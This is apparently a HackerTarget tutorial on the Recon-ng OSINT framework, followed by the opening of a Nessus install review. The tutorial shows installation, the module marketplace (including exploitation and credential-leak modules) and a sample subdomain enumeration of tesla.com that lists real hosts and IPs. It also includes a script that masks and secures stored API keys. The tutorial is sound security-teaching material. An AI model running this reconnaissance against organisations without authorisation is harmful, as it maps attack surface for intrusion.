Recon-NG Tutorial
HackerTarget.com, https://hackertarget.com/recon-ng-tutorial/ (Wed, 16 Nov 2022)
article revised and updated Nov 2022
In this recon-ng tutorial, discover open source intelligence and easily pivot to new results. Using a modular approach, collect and dig deeper into extracted data.

What is Recon-ng?

Recon-ng is a reconnaissance / OSINT tool with an interface similar to Metasploit. Running recon-ng from the command line speeds up the recon process as it automates gathering information from open sources.

Recon-ng has a variety of options to configure, perform recon, and output results to different report types.

OSINT with our Recon-NG Tutorial
The interactive console provides a number of helpful features such as command completion and contextual help.

Recon-ng Installation

Installing Recon-ng is simple and there are a few common ways. Below are a few examples:

Kali:

At the time of writing, version 5.1.2 comes pre-installed with Kali Linux. Even so, it is worth running apt-get update && apt-get install recon-ng to make sure the latest package and its dependencies are installed.

Ubuntu:

Requires git and pip to be installed (recon-ng 5 runs on Python 3, so use pip3 where pip still points at Python 2).

test@ubuntu:~/$ git clone https://github.com/lanmaster53/recon-ng.git
test@ubuntu:~/$ cd recon-ng
test@ubuntu:~/recon-ng/$ pip install -r REQUIREMENTS

Next, run recon-ng:

test@ubuntu:~/recon-ng/$ ./recon-ng

The Recon-NG console is now loaded.

    _/_/_/    _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/
   _/    _/  _/        _/        _/      _/  _/_/    _/            _/_/    _/  _/       
  _/_/_/    _/_/_/    _/        _/      _/  _/  _/  _/  _/_/_/_/  _/  _/  _/  _/  _/_/_/
 _/    _/  _/        _/        _/      _/  _/    _/_/            _/    _/_/  _/      _/ 
_/    _/  _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/    
                                                                                        

                                          /\
                                         / \\ /\
    Sponsored by...               /\  /\/  \\V  \/\
                                 / \\/ // \\\\\ \\ \/\
                                // // BLACK HILLS \/ \\
                               www.blackhillsinfosec.com

                  ____   ____   ____   ____ _____ _  ____   ____  ____
                 |____] | ___/ |____| |       |   | |____  |____ |
                 |      |   \_ |    | |____   |   |  ____| |____ |____
                                   www.practisec.com

                      [recon-ng v5.1.2, Tim Tomes (@lanmaster53)]                       

[*] No modules enabled/installed.

[recon-ng][default] > 

Using recon-ng

From the console it is easy to get help and get started with your recon.

[recon-ng][default] > help

Commands (type [help|?] ):
---------------------------------
back            Exits the current context
dashboard       Displays a summary of activity
db              Interfaces with the workspace's database
exit            Exits the framework
help            Displays this menu
index           Creates a module index (dev only)
keys            Manages third party resource credentials
marketplace     Interfaces with the module marketplace
modules         Interfaces with installed modules
options         Manages the current context options
pdb             Starts a Python Debugger session (dev only)
script          Records and executes command scripts
shell           Executes shell commands
show            Shows various framework items
snapshots       Manages workspace snapshots
spool           Spools output to a file
workspaces      Manages workspaces

Recon-ng starts as an empty framework: no modules are enabled or installed until you add them from the marketplace.

[*] No modules enabled/installed.

How to use Recon-ng:

Create a Workspace

There are many options when using this OSINT tool, and keeping collected information and notes organised is a necessary part of any OSINT investigation. Creating a workspace keeps things orderly and easy to find: all data located and collected while a workspace is active is saved to that workspace's database.

[recon-ng][default] > workspaces create example_name
[recon-ng][example_name] > 

The command recon-ng -w example_name opens or returns directly to that workspace (creating it if it does not yet exist).

test@ubuntu:~/$ recon-ng -w example_name 
[recon-ng][example_name] > 

Recon-ng Marketplace and Modules

Here again the help comes in handy: marketplace help shows the commands for installing and removing modules, getting more info on a module, searching, and refreshing the module index.

[recon-ng][default] > marketplace help
Interfaces with the module marketplace

Usage: marketplace info|install|refresh|remove|search [...] 

Typing marketplace search displays a list of all the modules, from which you can start following the white rabbit, exploring and getting deeper into recon and open source intelligence.

Recon-ng modules

Modules are grouped under the following categories, which can be seen by searching the marketplace:

- discovery
- exploitation
- import
- recon
- reporting

Each of the above has sub-categories as shown in the table below. Use marketplace search for the full table, which lists each module's version, status (installed or not installed), last updated date, and whether it has extra dependencies (D) or requires API keys (K).

[recon-ng][example_name] > marketplace search

  +---------------------------------------------------------------------------------------------------+
  |                        Path                        | Version |     Status    |  Updated   | D | K |
  +---------------------------------------------------------------------------------------------------+
  | discovery/info_disclosure/cache_snoop              | 1.1     | not installed | 2020-10-13 |   |   |
  | discovery/info_disclosure/interesting_files        | 1.2     | not installed | 2021-10-04 |   |   |
  | exploitation/injection/command_injector            | 1.0     | not installed | 2019-06-24 |   |   |
  | exploitation/injection/xpath_bruter                | 1.2     | not installed | 2019-10-08 |   |   |
  | import/csv_file                                    | 1.1     | not installed | 2019-08-09 |   |   |
  | import/list                                        | 1.1     | not installed | 2019-06-24 |   |   |
  | import/masscan                                     | 1.0     | not installed | 2020-04-07 |   |   |
  | import/nmap                                        | 1.1     | not installed | 2020-10-06 |   |   |
  | recon/companies-contacts/bing_linkedin_cache       | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/companies-contacts/censys_email_address      | 2.0     | not installed | 2021-05-11 | * | * |
  | recon/companies-contacts/pen                       | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/companies-domains/censys_subdomains          | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/companies-domains/pen                        | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/companies-domains/viewdns_reverse_whois      | 1.1     | not installed | 2021-08-24 |   |   |
  | recon/companies-domains/whoxy_dns                  | 1.1     | not installed | 2020-06-17 |   | * |
  | recon/companies-hosts/censys_org                   | 2.0     | not installed | 2021-05-11 | * | * |
  | recon/companies-hosts/censys_tls_subjects          | 2.0     | not installed | 2021-05-11 | * | * |
  | recon/companies-multi/github_miner                 | 1.1     | not installed | 2020-05-15 |   | * |
  | recon/companies-multi/shodan_org                   | 1.1     | not installed | 2020-07-01 | * | * |
  | recon/companies-multi/whois_miner                  | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/contacts-contacts/abc                        | 1.0     | not installed | 2019-10-11 | * |   |
  | recon/contacts-contacts/mailtester                 | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/contacts-contacts/mangle                     | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/contacts-contacts/unmangle                   | 1.1     | not installed | 2019-10-27 |   |   |
  | recon/contacts-credentials/hibp_breach             | 1.2     | not installed | 2019-09-10 |   | * |
  | recon/contacts-credentials/hibp_paste              | 1.1     | not installed | 2019-09-10 |   | * |
  | recon/contacts-domains/migrate_contacts            | 1.1     | not installed | 2020-05-17 |   |   |
  | recon/contacts-profiles/fullcontact                | 1.1     | not installed | 2019-07-24 |   | * |
  | recon/credentials-credentials/adobe                | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/credentials-credentials/bozocrack            | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/credentials-credentials/hashes_org           | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-companies/censys_companies           | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/domains-companies/pen                        | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/domains-companies/whoxy_whois                | 1.1     | not installed | 2020-06-24 |   | * |
  | recon/domains-contacts/hunter_io                   | 1.3     | not installed | 2020-04-14 |   | * |
  | recon/domains-contacts/metacrawler                 | 1.1     | not installed | 2019-06-24 | * |   |
  | recon/domains-contacts/pen                         | 1.1     | not installed | 2019-10-15 |   |   |
  | recon/domains-contacts/pgp_search                  | 1.4     | not installed | 2019-10-16 |   |   |
  | recon/domains-contacts/whois_pocs                  | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-contacts/wikileaker                  | 1.0     | not installed | 2020-04-08 |   |   |
  | recon/domains-credentials/pwnedlist/account_creds  | 1.0     | not installed | 2019-06-24 | * | * |
  | recon/domains-credentials/pwnedlist/api_usage      | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-credentials/pwnedlist/domain_creds   | 1.0     | not installed | 2019-06-24 | * | * |
  | recon/domains-credentials/pwnedlist/domain_ispwned | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-credentials/pwnedlist/leak_lookup    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-credentials/pwnedlist/leaks_dump     | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-domains/brute_suffix                 | 1.1     | not installed | 2020-05-17 |   |   |
  | recon/domains-hosts/binaryedge                     | 1.2     | not installed | 2020-06-18 |   | * |
  | recon/domains-hosts/bing_domain_api                | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/domains-hosts/bing_domain_web                | 1.1     | not installed | 2019-07-04 |   |   |
  | recon/domains-hosts/brute_hosts                    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/builtwith                      | 1.1     | not installed | 2021-08-24 |   | * |
  | recon/domains-hosts/censys_domain                  | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/domains-hosts/certificate_transparency       | 1.2     | not installed | 2019-09-16 |   |   |
  | recon/domains-hosts/google_site_web                | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/hackertarget                   | 1.1     | not installed | 2020-05-17 |   |   |
  | recon/domains-hosts/mx_spf_ip                      | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/netcraft                       | 1.1     | not installed | 2020-02-05 |   |   |
  | recon/domains-hosts/shodan_hostname                | 1.1     | not installed | 2020-07-01 | * | * |
  | recon/domains-hosts/spyse_subdomains               | 1.1     | not installed | 2021-08-24 |   | * |
  | recon/domains-hosts/ssl_san                        | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/threatcrowd                    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-hosts/threatminer                    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/domains-vulnerabilities/ghdb                 | 1.1     | not installed | 2019-06-26 |   |   |
  | recon/domains-vulnerabilities/xssed                | 1.1     | not installed | 2020-10-18 |   |   |
  | recon/hosts-domains/migrate_hosts                  | 1.1     | not installed | 2020-05-17 |   |   |
  | recon/hosts-hosts/bing_ip                          | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/hosts-hosts/censys_hostname                  | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/hosts-hosts/censys_ip                        | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/hosts-hosts/censys_query                     | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/hosts-hosts/ipinfodb                         | 1.2     | not installed | 2021-08-24 |   | * |
  | recon/hosts-hosts/ipstack                          | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/hosts-hosts/resolve                          | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-hosts/reverse_resolve                  | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-hosts/ssltools                         | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-hosts/virustotal                       | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/hosts-locations/migrate_hosts                | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-ports/binaryedge                       | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/hosts-ports/shodan_ip                        | 1.2     | not installed | 2020-07-01 | * | * |
  | recon/locations-locations/geocode                  | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/locations-locations/reverse_geocode          | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/locations-pushpins/flickr                    | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/locations-pushpins/shodan                    | 1.1     | not installed | 2020-07-07 | * | * |
  | recon/locations-pushpins/twitter                   | 1.1     | not installed | 2019-10-17 |   | * |
  | recon/locations-pushpins/youtube                   | 1.2     | not installed | 2020-09-02 |   | * |
  | recon/netblocks-companies/censys_netblock_company  | 2.0     | not installed | 2021-05-11 | * | * |
  | recon/netblocks-companies/whois_orgs               | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/netblocks-hosts/censys_netblock              | 2.0     | not installed | 2021-05-10 | * | * |
  | recon/netblocks-hosts/reverse_resolve              | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/netblocks-hosts/shodan_net                   | 1.2     | not installed | 2020-07-21 | * | * |
  | recon/netblocks-hosts/virustotal                   | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/netblocks-ports/census_2012                  | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/netblocks-ports/censysio                     | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/ports-hosts/migrate_ports                    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/ports-hosts/ssl_scan                         | 1.1     | not installed | 2021-08-24 |   |   |
  | recon/profiles-contacts/bing_linkedin_contacts     | 1.2     | not installed | 2021-08-24 |   | * |
  | recon/profiles-contacts/dev_diver                  | 1.1     | not installed | 2020-05-15 |   |   |
  | recon/profiles-contacts/github_users               | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/profiles-profiles/namechk                    | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/profiles-profiles/profiler                   | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/profiles-profiles/twitter_mentioned          | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/profiles-profiles/twitter_mentions           | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/profiles-repositories/github_repos           | 1.1     | not installed | 2020-05-15 |   | * |
  | recon/repositories-profiles/github_commits         | 1.0     | not installed | 2019-06-24 |   | * |
  | recon/repositories-vulnerabilities/gists_search    | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/repositories-vulnerabilities/github_dorks    | 1.0     | not installed | 2019-06-24 |   | * |
  | reporting/csv                                      | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/html                                     | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/json                                     | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/list                                     | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/proxifier                                | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/pushpin                                  | 1.0     | not installed | 2019-06-24 |   | * |
  | reporting/xlsx                                     | 1.0     | not installed | 2019-06-24 |   |   |
  | reporting/xml                                      | 1.1     | not installed | 2019-06-24 |   |   |
  +---------------------------------------------------------------------------------------------------+

  D = Has dependencies. See info for details.
  K = Requires keys. See info for details.

Marketplace search brings up the full table; however, you can be more specific in your search. A couple of examples:

[recon-ng][default] > marketplace search ssl
[*] Searching module index for 'ssl'...

  +----------------------------------------------------------------------------+
  |             Path            | Version |     Status    |  Updated   | D | K |
  +----------------------------------------------------------------------------+
  | recon/domains-hosts/ssl_san | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/hosts-hosts/ssltools  | 1.0     | not installed | 2019-06-24 |   |   |
  | recon/ports-hosts/ssl_scan  | 1.1     | not installed | 2021-08-24 |   |   |
  +----------------------------------------------------------------------------+

  D = Has dependencies. See info for details.
  K = Requires keys. See info for details.

[recon-ng][default] > 

To find out more about a specific module:

[recon-ng][default] > marketplace info ssltools

  +----------------------------------------------------------------------------------------+
  | path          | recon/hosts-hosts/ssltools                                             |
  | name          | SSLTools.com Host Name Lookups                                         |
  | author        | Tim Maletic (borrowing from the ssl_san module by Zach Graces)         |
  | version       | 1.0                                                                    |
  | last_updated  | 2019-06-24                                                             |
  | description   | Uses the ssltools.com site to obtain host names from a site's SSL      |
  |               | certificate metadata to update the 'hosts' table. Security issues with |
  |               | the certificate trust are pushed to the 'vulnerabilities' table.       |
  | required_keys | []                                                                     |
  | dependencies  | []                                                                     |
  | files         | []                                                                     |
  | status        | not installed                                                          |
  +----------------------------------------------------------------------------------------+

[recon-ng][default] > 

As noted above, HackerTarget has a module, and it will be used here as the worked example of how to use recon-ng.

Recon-ng example

The recon/domains-hosts/hackertarget module gathers subdomains of a domain using the HackerTarget hostname search API and adds each hostname and its IP address to the hosts table.

Install module

To install this module use the following:

[recon-ng][default] > marketplace install hackertarget
[*] Module installed: recon/domains-hosts/hackertarget
[*] Reloading modules...
[recon-ng][default] > 

Load module

[recon-ng][default] > modules load hackertarget
[recon-ng][default][hackertarget] > 

Module Help

The help command from within a loaded module has different options to the global 'help'.
When you are ready to explore more modules use 'back'.

[recon-ng][default][hackertarget] > help

Commands (type [help|?] ):
---------------------------------
back            Exits the current context
dashboard       Displays a summary of activity
db              Interfaces with the workspace's database
exit            Exits the framework
goptions        Manages the global context options
help            Displays this menu
info            Shows details about the loaded module
input           Shows inputs based on the source option
keys            Manages third party resource credentials
modules         Interfaces with installed modules
options         Manages the current context options
pdb             Starts a Python Debugger session (dev only)
reload          Reloads the loaded module
run             Runs the loaded module
script          Records and executes command scripts
shell           Executes shell commands
show            Shows various framework items
spool           Spools output to a file

[recon-ng][default][hackertarget] > 

Set source

Using show options brings up a table showing that SOURCE currently has its default value:

[recon-ng][default][hackertarget] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

Now set the source to the domain being investigated. This example uses tesla.com as they have a published bug bounty; only run recon against domains you are authorised to test.

Use the command options set SOURCE tesla.com:

[recon-ng][default][hackertarget] > options set SOURCE tesla.com
SOURCE => tesla.com

Use the command info. This shows the current value has changed to tesla.com, and lists the forms the SOURCE option accepts (the default query, a literal string, a file path, or a custom SQL query returning one column):

[recon-ng][default][hackertarget] > info

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  tesla.com      yes       source of input (see 'info' for details)

Source Options:
  default      SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
  string       string representing a single input
  path         path to a file containing a list of inputs
  query sql    database query returning one column of inputs

Use input to see exactly which inputs the module will run against, as resolved from SOURCE:

[recon-ng][default][hackertarget] > input

  +---------------+
  | Module Inputs |
  +---------------+
  | tesla.com     |
  +---------------+

Run the module

Type run to execute the module.

[recon-ng][default][hackertarget] > run

---------
TESLA.COM
---------
[*] Host: tesla.com
[*] Ip_Address: 104.119.104.74
[*] --------------------------------------------------
[*] Host: o7.ptr6980.tesla.com
[*] Ip_Address: 149.72.144.42
[*] --------------------------------------------------
[*] Host: vpn1.tesla.com
[*] Ip_Address: 8.45.124.215
[*] --------------------------------------------------
[*] Host: apacvpn1.tesla.com
[*] Ip_Address: 8.244.131.215
[*] --------------------------------------------------
[*] Host: cnvpn1.tesla.com
[*] Ip_Address: 114.141.176.215
[*] --------------------------------------------------
[*] Host: vpn2.tesla.com
[*] Ip_Address: 8.47.24.215
[*] --------------------------------------------------
[*] Host: model3.tesla.com
[*] Ip_Address: 205.234.27.221
[*] --------------------------------------------------
[*] Host: o3.ptr1444.tesla.com
[*] Ip_Address: 149.72.152.236
[*] --------------------------------------------------
[*] Host: o2.ptr556.tesla.com
[*] Ip_Address: 149.72.134.64
[*] --------------------------------------------------
[*] Host: o5.ptr8466.tesla.com
[*] Ip_Address: 149.72.172.170
[*] --------------------------------------------------
[*] Host: o6.ptr9437.tesla.com
[*] Ip_Address: 168.245.123.10
[*] --------------------------------------------------
[*] Host: o4.ptr1867.tesla.com
[*] Ip_Address: 149.72.163.58
[*] --------------------------------------------------
[*] Host: marketing.tesla.com
[*] Ip_Address: 13.111.47.196
[*] --------------------------------------------------
[*] Host: o1.ptr2410.link.tesla.com
[*] Ip_Address: 149.72.247.52
[*] --------------------------------------------------
[*] Host: referral.tesla.com
[*] Ip_Address: 72.10.32.90
[*] --------------------------------------------------
[*] Host: mta2.email.tesla.com
[*] Ip_Address: 13.111.4.231
[*] --------------------------------------------------
[*] Host: mta.email.tesla.com
[*] Ip_Address: 13.111.14.190
[*] --------------------------------------------------
[*] Host: xmail.tesla.com
[*] Ip_Address: 204.74.99.100
[*] --------------------------------------------------
[*] Host: comparison.tesla.com
[*] Ip_Address: 64.125.183.133
[*] --------------------------------------------------
[*] Host: apacvpn.tesla.com
[*] Ip_Address: 8.244.67.215
[*] --------------------------------------------------
[*] Host: cnvpn.tesla.com
[*] Ip_Address: 103.222.41.215
[*] --------------------------------------------------
[*] Host: emails.tesla.com
[*] Ip_Address: 13.111.18.27
[*] --------------------------------------------------
[*] Host: mta2.emails.tesla.com
[*] Ip_Address: 13.111.88.1
[*] --------------------------------------------------
[*] Host: mta3.emails.tesla.com
[*] Ip_Address: 13.111.88.2
[*] --------------------------------------------------
[*] Host: mta4.emails.tesla.com
[*] Ip_Address: 13.111.88.52
[*] --------------------------------------------------
[*] Host: mta5.emails.tesla.com
[*] Ip_Address: 13.111.88.53
[*] --------------------------------------------------
[*] Host: mta.emails.tesla.com
[*] Ip_Address: 13.111.62.118
[*] --------------------------------------------------
[*] Host: click.emails.tesla.com
[*] Ip_Address: 13.111.48.179
[*] --------------------------------------------------
[*] Host: view.emails.tesla.com
[*] Ip_Address: 13.111.49.179
[*] --------------------------------------------------
[*] Host: itanswers.tesla.com
[*] Ip_Address: 204.74.99.100
[*] --------------------------------------------------
[*] Host: events.tesla.com
[*] Ip_Address: 13.111.47.195
[*] --------------------------------------------------
[*] Host: www-uat.tesla.com
[*] Ip_Address: 199.66.9.47
[*] --------------------------------------------------
[*] Host: shop.eu.tesla.com
[*] Ip_Address: 205.234.27.221
[*] --------------------------------------------------
[*] Host: mfamobile-dev.tesla.com
[*] Ip_Address: 205.234.27.209
[*] --------------------------------------------------
[*] Host: mfauser-dev.tesla.com
[*] Ip_Address: 205.234.27.209
[*] --------------------------------------------------


-------
SUMMARY
-------
[*] 35 total (35 new) hosts found.

Show hosts

Now the hosts table has started to populate. Typing show hosts gives a summary of the resources discovered so far, including which module found each one.

[recon-ng][default][hackertarget] > show hosts
  +----------------------------------------------------------------------------------------------------------------------+
  | rowid | host                      | ip_address      | region | country | latitude | longitude | notes | module       |
  +----------------------------------------------------------------------------------------------------------------------+
  | 1     | tesla.com                 | 104.119.104.74  |        |         |          |           |       | hackertarget |
  | 2     | o7.ptr6980.tesla.com      | 149.72.144.42   |        |         |          |           |       | hackertarget |
  | 3     | vpn1.tesla.com            | 8.45.124.215    |        |         |          |           |       | hackertarget |
  | 4     | apacvpn1.tesla.com        | 8.244.131.215   |        |         |          |           |       | hackertarget |
  | 5     | cnvpn1.tesla.com          | 114.141.176.215 |        |         |          |           |       | hackertarget |
  | 6     | vpn2.tesla.com            | 8.47.24.215     |        |         |          |           |       | hackertarget |
  | 7     | model3.tesla.com          | 205.234.27.221  |        |         |          |           |       | hackertarget |
  | 8     | o3.ptr1444.tesla.com      | 149.72.152.236  |        |         |          |           |       | hackertarget |
  | 9     | o2.ptr556.tesla.com       | 149.72.134.64   |        |         |          |           |       | hackertarget |
  | 10    | o5.ptr8466.tesla.com      | 149.72.172.170  |        |         |          |           |       | hackertarget |
  | 11    | o6.ptr9437.tesla.com      | 168.245.123.10  |        |         |          |           |       | hackertarget |
  | 12    | o4.ptr1867.tesla.com      | 149.72.163.58   |        |         |          |           |       | hackertarget |
  | 13    | marketing.tesla.com       | 13.111.47.196   |        |         |          |           |       | hackertarget |
  | 14    | o1.ptr2410.link.tesla.com | 149.72.247.52   |        |         |          |           |       | hackertarget |
  | 15    | referral.tesla.com        | 72.10.32.90     |        |         |          |           |       | hackertarget |
  | 16    | mta2.email.tesla.com      | 13.111.4.231    |        |         |          |           |       | hackertarget |
  | 17    | mta.email.tesla.com       | 13.111.14.190   |        |         |          |           |       | hackertarget |
  | 18    | xmail.tesla.com           | 204.74.99.100   |        |         |          |           |       | hackertarget |
  | 19    | comparison.tesla.com      | 64.125.183.133  |        |         |          |           |       | hackertarget |
  | 20    | apacvpn.tesla.com         | 8.244.67.215    |        |         |          |           |       | hackertarget |
  | 21    | cnvpn.tesla.com           | 103.222.41.215  |        |         |          |           |       | hackertarget |
  | 22    | emails.tesla.com          | 13.111.18.27    |        |         |          |           |       | hackertarget |
  | 23    | mta2.emails.tesla.com     | 13.111.88.1     |        |         |          |           |       | hackertarget |
  | 24    | mta3.emails.tesla.com     | 13.111.88.2     |        |         |          |           |       | hackertarget |
  | 25    | mta4.emails.tesla.com     | 13.111.88.52    |        |         |          |           |       | hackertarget |
  | 26    | mta5.emails.tesla.com     | 13.111.88.53    |        |         |          |           |       | hackertarget |
  | 27    | mta.emails.tesla.com      | 13.111.62.118   |        |         |          |           |       | hackertarget |
  | 28    | click.emails.tesla.com    | 13.111.48.179   |        |         |          |           |       | hackertarget |
  | 29    | view.emails.tesla.com     | 13.111.49.179   |        |         |          |           |       | hackertarget |
  | 30    | itanswers.tesla.com       | 204.74.99.100   |        |         |          |           |       | hackertarget |
  | 31    | events.tesla.com          | 13.111.47.195   |        |         |          |           |       | hackertarget |
  | 32    | www-uat.tesla.com         | 199.66.9.47     |        |         |          |           |       | hackertarget |
  | 33    | shop.eu.tesla.com         | 205.234.27.221  |        |         |          |           |       | hackertarget |
  | 34    | mfamobile-dev.tesla.com   | 205.234.27.209  |        |         |          |           |       | hackertarget |
  | 35    | mfauser-dev.tesla.com     | 205.234.27.209  |        |         |          |           |       | hackertarget |
  +----------------------------------------------------------------------------------------------------------------------+

[*] 35 rows returned

[recon-ng][default][hackertarget] > 

--------------------------------------------------------------

Add API keys to Recon-ng

It is a simple matter to add API keys to recon-ng. Shodan with a PRO account is a highly recommended option. This will enable queries to open ports on your discovered hosts without sending any packets to the target systems.

How to add shodan API key

Create or log in to your Shodan account, then go to 'Account' in the top right corner. The API key is listed on the Account Overview page.

Recon-ng shows the syntax for adding an API key:

[recon-ng][default] > keys add 
Adds/Updates a third party resource credential

Usage: keys add name value
[recon-ng][default] > keys add shodan_api bbexampleapikey33

.recon-ng configuration files

When you install recon-ng on your machine, it creates a folder in your home directory called .recon-ng. This folder contains keys.db. If you are upgrading from one version to another or have changed computers, and have previously configured modules that require keys, copy this file from the old installation to the new one so you do not have to start over.

test@test-desktop:~/.recon-ng$ ls

keys.db  
modules  
modules.yml  
workspaces

test@test-desktop:~/.recon-ng$ 
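
The keys.db file above holds your API keys in plaintext, so before copying it around it is worth checking what is in it and who can read it. The following is an added example (not code from the recon-ng project) that lists the stored key names with the values masked, checks that the file is not group- or world-readable, and copies it into a new .recon-ng directory with its mode clamped to 0600. It assumes the schema recon-ng uses for keys.db is a single table `keys` with columns `name` and `value`; confirm with `sqlite3 ~/.recon-ng/keys.db .schema` before relying on it. The demo builds a constructed keys.db in a temporary directory so it never touches your real one.

```python
"""Inspect and safely migrate a recon-ng keys.db (added example, not recon-ng code).

Assumed schema (verify against your install): CREATE TABLE keys (name TEXT PRIMARY KEY, value TEXT)
"""
import os
import shutil
import sqlite3
import stat
import tempfile
from pathlib import Path


def mask(value):
    """Show only the last 4 characters of a secret, never the whole key."""
    if not value:
        return "(unset)"
    return "*" * max(len(value) - 4, 0) + value[-4:]


def list_keys(db_path):
    """Return {name: masked value} for every credential stored in keys.db."""
    conn = sqlite3.connect(db_path)
    try:
        rows = conn.execute("SELECT name, value FROM keys ORDER BY name").fetchall()
    finally:
        conn.close()
    return {name: mask(value) for name, value in rows}


def permissions_ok(db_path):
    """keys.db holds plaintext API keys: it must not be group- or world-accessible."""
    mode = stat.S_IMODE(os.stat(db_path).st_mode)
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


def migrate_keys_db(src, new_recon_dir):
    """Copy keys.db into another .recon-ng directory and clamp its mode to 0600."""
    dst = Path(new_recon_dir) / "keys.db"
    shutil.copy2(src, dst)
    os.chmod(dst, 0o600)
    return str(dst)


def make_sample_db(path):
    """Constructed sample database with the assumed schema and fake key values."""
    conn = sqlite3.connect(path)
    try:
        conn.execute("CREATE TABLE IF NOT EXISTS keys (name TEXT PRIMARY KEY, value TEXT)")
        conn.executemany(
            "INSERT OR REPLACE INTO keys VALUES (?, ?)",
            [("shodan_api", "bbexampleapikey33"), ("github_api", None)],
        )
        conn.commit()
    finally:
        conn.close()
    os.chmod(path, 0o644)  # deliberately too loose, so the demo has something to fix
    return path


def demo():
    """Build the sample db in a temp dir, migrate it, and report before/after permissions."""
    old_dir = tempfile.mkdtemp(prefix="old-recon-ng-")
    new_dir = tempfile.mkdtemp(prefix="new-recon-ng-")
    src = make_sample_db(os.path.join(old_dir, "keys.db"))
    dst = migrate_keys_db(src, new_dir)
    return {
        "keys": list_keys(dst),
        "old_perms_ok": permissions_ok(src),
        "new_perms_ok": permissions_ok(dst),
    }


if __name__ == "__main__":
    for item, value in demo().items():
        print(item, value)
```

To run it against your real file, call `list_keys(os.path.expanduser("~/.recon-ng/keys.db"))` and `permissions_ok(...)` on the same path; the masked listing tells you which modules will keep working after the move without ever printing a key.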

Conclusion

Recon-ng is a powerful tool that can be further explored by viewing the list of modules. The help within the console is clear, and with a bit of playing around it won't take long to become an expert.

The rise of bug bounties allows you to play with new tools and explore organisations' ever-expanding attack surface footprint. Have fun. Don't break the rules.

For a great overview of version 5, check out the YouTube video by Tim Tomes.
Nessus 10 On Ubuntu 20.04 Install And Mini Review https://hackertarget.com/nessus-ubuntu-install/ Wed, 02 Feb 2022 00:05:44 +0000

Nessus v10.0.0 was released in Nov 2021. A name change in 2019 saw Nessus Home become Nessus Essentials. Nessus Essentials is Tenable's free version of its vulnerability scanner. Limited to 16 IPs with unlimited time usage. If you need more than that, there is an option for a free trial for seven days to Nessus Professional - or a full upgrade starting at USD 2,990 per year.

Nessus 10.0 even has support for Raspberry Pi allowing it to be deployed anywhere.

A Hacker Target team member grabbed a copy of Nessus Essentials 10.0.0 and installed it on a clean Ubuntu 20.04 system. NB: This is just a quick look at the product. We do not use it commercially as part of the work done by HackerTarget.com, as this would require Nessus Pro, and we favour the open source OpenVAS vulnerability scanner.

Register for an Activation Code

[Image: Nessus Essentials activation registration form]

Although free, Nessus Essentials requires the user to register for an activation code.

This activation code does not expire; however, it is single-use. If you want to install Nessus on another machine or reinstall it, you need to register for another code.

Check your email for a message from Tenable with the activation code inside.

Download and Install

We are going to run Nessus on Ubuntu using the Debian package. Head to the downloads page.

The install takes less than a minute. It is fast and easy, as you can see below.

user@acidburn:~$ sudo dpkg -i Downloads/Nessus-10.0.0-ubuntu1110_amd64.deb
[sudo] password for user:

Selecting previously unselected package nessus.
